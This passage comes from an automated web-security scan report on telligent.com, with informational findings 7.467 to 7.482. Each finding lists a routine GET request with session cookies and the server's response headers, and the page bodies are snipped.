Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a28+GMT; expires=Sun, 26-Feb-2012 23:21:28 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:28 GMT
Connection: close
Content-Length: 50661


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.467. http://telligent.com/resources/m/analysts/1343205.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /resources/m/analysts/1343205.aspx

Request

GET /resources/m/analysts/1343205.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a31+GMT; expires=Sun, 26-Feb-2012 23:21:31 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:30 GMT
Connection: close
Content-Length: 64051


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.468. http://telligent.com/resources/m/analysts/1345217.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /resources/m/analysts/1345217.aspx

Request

GET /resources/m/analysts/1345217.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a34+GMT; expires=Sun, 26-Feb-2012 23:21:34 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:33 GMT
Connection: close
Content-Length: 64762


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.469. http://telligent.com/resources/m/success_stories/1331597.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /resources/m/success_stories/1331597.aspx

Request

GET /resources/m/success_stories/1331597.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a51+GMT; expires=Sun, 26-Feb-2012 23:21:51 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:50 GMT
Connection: close
Content-Length: 63990


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.470. http://telligent.com/resources/m/white_papers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /resources/m/white_papers/

Request

GET /resources/m/white_papers/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a30+GMT; expires=Sun, 26-Feb-2012 23:21:30 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:30 GMT
Connection: close
Content-Length: 50618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.471. http://telligent.com/rss.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /rss.aspx

Request

GET /rss.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml; charset=utf-8
Last-Modified: Thu, 24 Feb 2011 23:34:00 GMT
ETag: 2/24/2011 5:34:00 PM
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a09+GMT; expires=Sun, 26-Feb-2012 23:21:09 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:09 GMT
Connection: close
Content-Length: 35739

<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="http://telligent.com/utility/FeedStylesheets/rss.xsl" media="screen"?><rss version="2.0" xmlns:dc="http://purl.org/dc/el
...[SNIP]...

7.472. http://telligent.com/services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /services/

Request

GET /services/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a08+GMT; expires=Sun, 26-Feb-2012 23:22:08 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:08 GMT
Connection: close
Content-Length: 51512


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.473. http://telligent.com/support/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /support/

Request

GET /support/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a28+GMT; expires=Sun, 26-Feb-2012 23:22:28 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:27 GMT
Connection: close
Content-Length: 67288


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.474. http://telligent.com/support/analytics/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /support/analytics/

Request

GET /support/analytics/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a41+GMT; expires=Sun, 26-Feb-2012 23:22:41 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:41 GMT
Connection: close
Content-Length: 128996


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.475. http://telligent.com/support/communityserver/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /support/communityserver/

Request

GET /support/communityserver/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a41+GMT; expires=Sun, 26-Feb-2012 23:22:41 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:41 GMT
Connection: close
Content-Length: 129073


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.476. http://telligent.com/support/csevolution/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /support/csevolution/

Request

GET /support/csevolution/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a42+GMT; expires=Sun, 26-Feb-2012 23:22:42 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:41 GMT
Connection: close
Content-Length: 124851


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.477. http://telligent.com/support/harvest/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /support/harvest/

Request

GET /support/harvest/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a45+GMT; expires=Sun, 26-Feb-2012 23:22:45 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:44 GMT
Connection: close
Content-Length: 61524


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.478. http://telligent.com/support/request_an_upgrade/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /support/request_an_upgrade/

Request

GET /support/request_an_upgrade/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a46+GMT; expires=Sun, 26-Feb-2012 23:22:46 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:45 GMT
Connection: close
Content-Length: 61133


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.479. http://telligent.com/support/telligent_evolution_platform/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /support/telligent_evolution_platform/

Request

GET /support/telligent_evolution_platform/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a38+GMT; expires=Sun, 26-Feb-2012 23:22:38 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:38 GMT
Connection: close
Content-Length: 130906


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.480. http://telligent.com/support/telligent_evolution_platform/community/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /support/telligent_evolution_platform/community/

Request

GET /support/telligent_evolution_platform/community/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a39+GMT; expires=Sun, 26-Feb-2012 23:22:39 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:39 GMT
Connection: close
Content-Length: 126136


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.481. http://telligent.com/support/telligent_evolution_platform/enterprise/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /support/telligent_evolution_platform/enterprise/

Request

GET /support/telligent_evolution_platform/enterprise/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a39+GMT; expires=Sun, 26-Feb-2012 23:22:39 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:39 GMT
Connection: close
Content-Length: 125884


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.482. http://telligent.com/support/telligent_evolution_platform/w/documentation/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /support/telligent_evolution_platform/w/documentation/

Request

GET /support/telligent_evolution_platform/w/documentation/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
